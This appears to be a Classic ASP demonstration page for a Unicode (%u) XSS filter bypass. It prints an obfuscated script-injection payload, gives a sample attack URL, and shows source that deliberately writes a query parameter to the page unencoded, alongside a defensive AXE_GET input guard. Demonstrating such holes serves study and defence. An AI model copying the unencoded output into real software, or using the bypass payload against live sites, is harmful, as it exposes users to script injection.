Unicode (UTF-16) bypass in Classic ASP

Hello World
%u3008scr%u0131pt%u3009%u212fval(%uFF07al%u212Frt("XSS hole")%u02C8)%u2329/scr%u0131pt%u232A
%u3008scr%u0131pt%u3009%u212fval(%uFF07al%u212Frt("XSS hole")%u02C8)%u2329/scr%u0131pt%u232A

Note

Use CTRL+U (View Source) to see that the value read from the QueryString injected a script (alert("XSS hole")) into the page; the page writes that value to the response without HTML-encoding it.


Source

<pre><%

' http://zendold.lojcomm.com.br/t.asp?i=%u3008scr%u0131pt%u3009%u212fval%28%uFF07al%u212Frt%28%22XSS%22%29%u02C8%29%u2329/scr%u0131pt%u232A
' More info: http://hackademix.net/2010/08/17/lost-in-translation-asps-homoxssuality/

' Demo body: each value below is written into the response as-is; nothing on
' this page HTML-encodes its output.
Response.write( "Hello World" )
Response.write( vbNewline )

' Unprotected path: the "u" parameter goes from Request.QueryString straight
' into the page. A production page should wrap the value in
' Server.HTMLEncode(...) (or the encoder that matches the output context).
' NOTE(review): the sample URL in the comment above passes "i", while this
' code reads "u" - confirm which parameter name is intended.
Response.write( Request.QueryString("u") )
Response.write( vbNewline )

' Same parameter read through the AXE_GET helper defined in the server-side
' script block further down. Its result is likewise written without HTML
' encoding, so AXE_GET is not a substitute for output encoding.
Response.write( AXE_GET("u") )
Response.write( vbNewline )

%></pre>
<script language="javascript" runat="server">
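/**
 * Read query-string parameter `k`, but only let ASP decode it when the raw
 * query string is valid standard percent-encoding.
 *
 * decodeURIComponent() is used purely as a validity probe over the whole raw
 * QUERY_STRING. It throws on malformed escape sequences, and the %uXXXX form
 * used by this page's sample payload is not valid percent-encoding. When the
 * probe succeeds the value comes from Request.QueryString(k). When anything
 * in the try block throws, the value is cut out of the raw query string and
 * returned exactly as sent, still encoded.
 *
 * Security note: this is an input guard, not an output encoder. Neither path
 * HTML-encodes the result, and a well-formed percent-encoded value is decoded
 * as usual, so callers that write the result into a page still need
 * Server.HTMLEncode (or the encoder that matches the output context).
 *
 * @param {string} k Parameter name. The fallback matches it case-sensitively
 *     against the raw text, as the literal prefix "k=".
 * @returns {*} Whatever Request.QueryString(k) yields on the normal path. On
 *     the fallback path, the raw text after "k=" of the last matching pair,
 *     or "" when no pair matches.
 */
function AXE_GET(k) {
    var v = "",
        q = Request.ServerVariables("QUERY_STRING");
    try {
        // Probe only. The decoded text is deliberately not stored: keeping it
        // in v would let the whole decoded query string be returned if the
        // lookup below threw and the fallback found no matching pair.
        decodeURIComponent(q);
        v = Request.QueryString(k);
    } catch (Ex) {
        // Fallback: never hand the suspect query string to ASP's decoder.
        var pairs = String(q).split('&'),
            prefix = k + '=';
        for (var i = 0, len = pairs.length; i < len; i++) {
            // No break: when the key repeats, the last occurrence wins.
            if (pairs[i].indexOf(prefix) === 0) {
                v = pairs[i].substring(prefix.length);
            }
        }
    }
    return v;
}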
</script>